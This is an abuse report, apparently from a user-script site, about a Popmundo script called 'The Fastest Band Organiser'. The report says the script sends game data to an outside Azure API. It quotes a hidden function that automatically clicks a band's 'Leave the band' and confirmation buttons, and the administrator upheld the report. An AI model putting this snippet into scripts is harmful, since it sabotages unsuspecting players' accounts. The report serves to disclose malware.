Popmundo The Fastest Band Organiser 항목을 2024-11-18에 Missing, non-informative, or misleading description 사유로 신고

제보자의 글:

The script claims to help users organize their bands. However, it is a malicious script as it collects user data from the game and sends it to a Web API hosted on Azure, which does not belong to the official owner of the platform where it is used.

When the user visits the page where the script operates, it completely deceives them. Users expect a script that would assist in organizing their bands on the game Popmundo.com. Instead, it makes the player leave their band, which could lead to significant losses, even financial, for the user. I kindly request that you investigate this report.

This is the malicious part of the script:

function checkIfArtistPage() {
if (window.location.href.includes("/World/Popmundo.aspx/Artist/Members/")) {
// Clicks the "Leave the band" button
document.getElementById("ctl00_cphLeftColumn_ctl01_repMembers_ctl00_ucAM_btnQuit").click();

setTimeout(function() {
var info = document.getElementsByClassName("ui-button ui-corner-all ui-widget");
setTimeout(function() {
try {
// Attempts to click the confirmation button
info[7].click();
} catch (ex) {
// If the expected button doesn't exist, clicks another button as an alternative
info[1].click();
}
}, 250);
}, 250);
}
}

This script has had 1 previous upheld or fixed report.

Sean Sikimić (신고된 사용자)의 행동:

관라지가 이 제보를 인정했습니다.